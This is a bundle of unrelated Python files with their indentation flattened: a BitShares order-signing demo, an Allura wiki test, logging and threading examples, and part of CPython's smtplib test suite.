signal.value = 1
return None
def prototype_order():
# creates an auto formatted empty prototype order in json format
# you will add your ['edicts'] and ['wif']
# metaNODE handles everything else
# usage
'''
from manualSIGNING import prototype_order
order = json_loads(prototype_order())
order['header']['wif'] = wif
order['edicts'] = edicts
broker(order)
'''
proto = {}
metaNODE = Bitshares_Trustless_Client()
proto['op'] = ''
proto['nodes'] = metaNODE['whitelist']
proto['header'] = {}
proto['header']['asset_id'] = metaNODE['asset_id']
proto['header']['currency_id'] = metaNODE['currency_id']
proto['header']['asset_precision'] = metaNODE['asset_precision']
proto['header']['currency_precision'] = metaNODE['currency_precision']
proto['header']['account_id'] = metaNODE['account_id']
proto['header']['account_name'] = metaNODE['account_name']
del metaNODE
return json_dumps(proto)
' IN SCRIPT DEMONSTRATION '
def log_in():
global wif, account_name, account_id
global order, order1, order2, order3, nodes
print("\033c") # clear terminal
# bitshares ascii logo encoded and compressed
b = b'x\x9c\xad\xd4M\n\xc4 \x0c\x05\xe0}O1P\x12B\x10\xbc\x82\xf7?\xd5\xf8\xaf\x83F\xe3\xe0[t\xf9\xf5%\xda>\x9f\x1c\xf7\x7f\x9e\xb9\x01\x17\x0cc\xec\x05\xe3@Y\x18\xc6(\'Z\x1a\xca.\x1bC\xa5l\r\x85\xa20\xb6\x8a\xca\xd8,W0\xec\x05\xc3\xdf\xd4_\xe3\r\x11(q\x16\xec\x95l\x04\x06\x0f\x0c\xc3\xddD\x9dq\xd2#\xa4NT\x0c/\x10\xd1{b\xd4\x89\x92\x91\x84\x11\xd9\x9d-\x87.\xe4\x1cB\x15|\xe0\xc8\x88\x13\xa5\xbc\xd4\xa21\x8e"\x18\xdc\xd2\x0e\xd3\xb6\xa0\xc6h\xa3\xd4\xde\xd0\x19\x9a\x1e\xd8\xddr\x0e\xcf\xf8n\xe0Y\rq\x1fP:p\x92\xf2\xdbaB,v\xda\x84j\xc4.\x03\xb1>\x97\xee{\x99oSa\x00\x0f\xc6\x84\xd8\xdf\x0f\xb4e\xa7$\xfdE\xae\xde\xb1/\x1d\xfc\x96\x8a'
print(cyan(decompress(b).decode()))
print(green(' y**2 = x**3 + 7'))
print('************************************************************')
print('')
print(green(' manualSIGNING - BUY/SELL/CANCEL OPS v%.8f alpha' % VERSION))
print('')
print('************************************************************')
print('')
print(' given a buy/sell/cancel order and wif:')
print(' convert to graphene terms')
print(' serialize the transaction')
print(' perform ECDSA')
print(' broadcast to a public node')
print(' use only standard python modules')
print(' spell the rest out here concisely')
print('')
print(' if you input name and wif this script will:')
print('')
print(red(' BUY 10 BTS with OPEN.BTC at 0.00000100'))
print('')
print(green(" WITHOUT IMPORTING PYBITSHARES "))
print('')
print('enter account name (press ENTER for demo)')
print('')
account_name = input('account name: ')
print('')
print('lookup account_id...')
print('')
if account_name == '':
account_name = 'fd' # some random acct
print('using mock account for demo: %s' % account_name)
nodes = order1['nodes']
# create a websocket connection
wss_handshake()
# convert account name to id via rpc request
account_id = rpc_account_id()
print(account_id)
print('')
# input wallet import format key for authentication
wif = getpass(prompt='enter wif (press ENTER for demo): ')
if not wif:
# some random wif
wif = "5JLw5dgQAx6rhZEgNN5C2ds1V47RweGshynFSWFbaMohsYsBvE8"
print('using sample wallet import format (wif)')
print(wif)
print('')
print(green('BEGIN DEMO'))
print('')
# add wif, account_id, and account_name to sample order headers
order1['header']['wif'] = wif
order1['header']['account_id'] = account_id
order1['header']['account_name'] = account_name
order2['header']['wif'] = wif
order2['header']['account_id'] = account_id
order2['header']['account_name'] = account_name
order3['header']['wif'] = wif
order3['header']['account_id'] = account_id
order3['header']['account_name'] = account_name
print(' 1:buy, 2:cancel, 3:authenticate ')
select = 0
while select not in [1, 2, 3]:
select = int(input('1, 2, or 3? '))
if select == 1:
order = order1
if select == 2:
order = order2
if select == 3:
order = order3
def demo():
# this is the backbone of events for the demo
'''
receive order
build graphene transaction
serialize transaction
sign transaction
verify transaction
broadcast transaction
'''
try:
print(purple('======================================'))
print(purple('receive order '))
print(purple('======================================'))
pprint(order)
print('')
except Exception as e:
trace(e)
try:
print(purple('======================================'))
print(purple('build graphene transaction from order '))
print(purple('======================================'))
tx = build_transaction(order)
pprint(tx)
print('')
except Exception as e:
trace(e)
if len(tx['operations']):
try:
print(purple('======================================'))
print(purple('serialize transaction bytes string '))
print(purple('======================================'))
tx, message = serialize_transaction(tx)
pprint(tx)
print('')
except Exception as e:
trace(e)
try:
print(purple('======================================'))
print(purple('sign transaction with wif '))
print(purple('======================================'))
signed_tx = sign_transaction(tx, message)
pprint(signed_tx)
print('')
except Exception as e:
trace(e)
try:
print(purple('======================================'))
print(purple('verify the signature on transaction '))
print(purple('======================================'))
signed_tx = verify_transaction(signed_tx)
pprint(signed_tx)
print('')
except Exception as e:
trace(e)
try:
print(purple('======================================'))
print(purple('broadcast transaction '))
print(purple('======================================'))
broadcasted_tx = rpc_broadcast_transaction(signed_tx)
pprint(broadcasted_tx)
print('')
except Exception as e:
trace(e)
else:
print('no operations to broadcast')
try:
ws.close()
print(purple('connection terminated'))
except Exception as e:
trace(e)
print('')
print('END')
def main():
sample_orders()
global_constants()
global_variables()
control_panel()
log_in()
demo()
if __name__ == "__main__":
main()
|
test_models.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pylons import tmpl_context as c
from ming.orm import session
from allura.tests import TestController
from allura.tests import decorators as td
from alluratest.controller import setup_global_objects
from allura import model as M
from allura.lib import helpers as h
from forgewiki.model import Page
class TestPageSnapshots(TestController):
@td.with_wiki
def test_version_race(self):
# threads must not throw DuplicateKeyError
# details https://sourceforge.net/p/allura/tickets/7647/
import time
import random
from threading import Thread, Lock
page = Page.upsert('test-page')
page.commit()
lock = Lock()
def run(n):
setup_global_objects()
for i in range(10):
page = Page.query.get(title='test-page')
page.text = 'Test Page %s.%s' % (n, i)
time.sleep(random.random())
# tests use mim (mongo-in-memory), which isn't thread-safe
lock.acquire()
try:
page.commit()
finally:
lock.release()
t1 = Thread(target=lambda: run(1))
t2 = Thread(target=lambda: run(2))
t1.start()
t2.start()
t1.join()
t2.join()
page = Page.query.get(title='test-page')
# 10 changes by each thread + initial upsert
assert page.history().count() == 21, page.history().count()
class TestPage(TestController):
@td.with_wiki
def test_authors(self):
user = M.User.by_username('test-user')
admin = M.User.by_username('test-admin')
with h.push_config(c, user=admin):
page = Page.upsert('test-admin')
page.text = 'admin'
page.commit()
with h.push_config(c, user=user):
page.text = 'user'
page.commit()
authors = page.authors()
assert len(authors) == 2
assert user in authors
assert admin in authors
user.disabled = True
session(user).flush(user)
authors = page.authors()
assert len(authors) == 1
assert user not in authors
assert admin in authors
|
sshlogger.py | '''
Created on Sep 24, 2017
@author: arnon
'''
from acrilog import SSHLogger
import multiprocessing as mp
import logging
def log(logger_info):
logger1 = SSHLogger.get_logger(logger_info, name='example.e1')
logger2 = SSHLogger.get_logger(logger_info, name='example.e2')
logger2.info('How quickly daft jumping zebras vex.')
logger1.warning('Jail zesty vixen who grabbed pay from quack.')
logger1.debug('Quick zephyrs blow, vexing daft Jim.')
logger2.error('The five boxing wizards jump quickly.')
def main():
sshlogger = SSHLogger('example', logging_level=logging.DEBUG, console=True, consolidate=True)
sshlogger.start()
logger_info = sshlogger.logger_info()
logger = SSHLogger.get_logger(logger_info=logger_info)
logger.info('Jackdaws love my big sphinx of quartz.')
client = mp.Process(target=log, args=(logger_info,))
client.start()
client.join()
sshlogger.stop()
if __name__ == '__main__':
mp.freeze_support()
mp.set_start_method('spawn')
main()
|
Logger.py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 26 15:56:10 2016
@author: Dell
"""
from time import ctime
import threading
def info(log:str,target='console'):
"""
log: text to record.
target: 'console' to print log on screen or file to write in.
"""
if target=='console':
thd=threading.Thread(target=print,args=(ctime(),':',log))
thd.setDaemon(True)
thd.start()
thd.join()
else:
try:
thd=threading.Thread(target=print,args=(ctime(),':',log))
thd.setDaemon(True)
thd.start()
thd.join()
except Exception as e:
print(e)
def write_file(text,target):
try:
f=open(target)
f.write(text)
except Exception as e:
print(e)
finally:
f.close() |
func.py | # import threading as tr
# # from time import sleep, time
# import time
# def foo(num):
# print(tr.current_thread())
# sleep(2)
# print(num)
# start = time()
# print(tr.current_thread())
# thr1 = tr.Thread(target=foo, args=(1, ))
# thr2 = tr.Thread(target=foo, args=(2, ))
# thr1.start()
# thr2.start()
# thr1.join()
# thr2.join()
# print(f'Done in: {time()-start}')
#-----------------------------------
# def foo(num):
# print(tr.current_thread())
# sleep(num)
# start = time()
# threads = []
# for i in range(10):
# thr1 = tr.Thread(target=foo, args=(1, ))
# thr1.start()
# threads.append(thr1)
# while threads:
# print(threads, len(threads))
# sleep(0.5)
# for index, th in enumerate(threads):
# if not th.is_alive():
# threads.pop(index)
# print('Done')
# #---------------------------------
# import os
# import requests
# import time
# import threading as th
# def save_image():
# url = 'https://loremflickr.com/320/240/dog'
# response = requests.get(url)
# name = response.url.split('/')[-1]
# path = os.path.join(os.getcwd(), 'images', name)
# with open(path, 'wb') as file:
# file.write(response.content)
# start = time.time()
# threads = []
# for _ in range(100):
# t = th.Thread(target=save_image)
# t.start()
# threads.append(t)
# for th in threads:
# th.join()
# print(time.time() - start)
# #---------------------------------
# Многопоточность в многопроцессинг
# import os
# import requests
# from multiprocessing.pool import ThreadPool
# def save_image(*args):
# url = 'https://loremflickr.com/320/240/dog'
# response = requests.get(url)
# name = response.url.split('/')[-1]
# path = os.path.join(os.getcwd(), 'images', name)
# with open(path, 'wb') as file:
# file.write(response.content)
# start = time.time()
# with ThreadPool(25) as pool:
# pool.map(save_image, range(100))
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# countdown(count)
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# t1 = tr.Thread(target=countdown, args=(count//2, ))
# t2 = tr.Thread(target=countdown, args=(count//2, ))
# t1.start()
# t2.start()
# t1.join()
# t2.join()
# print(time.time() - start)
# #===============================
# import time
# import threading as tr
# import multiprocessing as mpr
# cpu_count = mpr.cpu_count()*2
# print(cpu_count)
# count = 500_000_000
# def countdown(n):
# while n > 0:
# n-=1
# start = time.time()
# p1 = mpr.Process(target=countdown, args=(count//2, ))
# p2 = mpr.Process(target=countdown, args=(count//2, ))
# p1.start()
# p2.start()
# p1.join()
# p2.join()
# print(time.time() - start)
#===============================
import time
import threading as tr
import multiprocessing as mpr
cpu_count = mpr.cpu_count()*2
print(cpu_count)
count = 500_000_000
def countdown(n):
while n > 0:
n-=1
start = time.time()
processes = []
for i in range(cpu_count):
p1 = mpr.Process(target=countdown, args=(count//cpu_count, ))
p1.start()
processes.append(p1)
for p in processes:
p.join()
print(time.time() - start) |
test_smtplib.py | import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
from unittest.mock import Mock
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
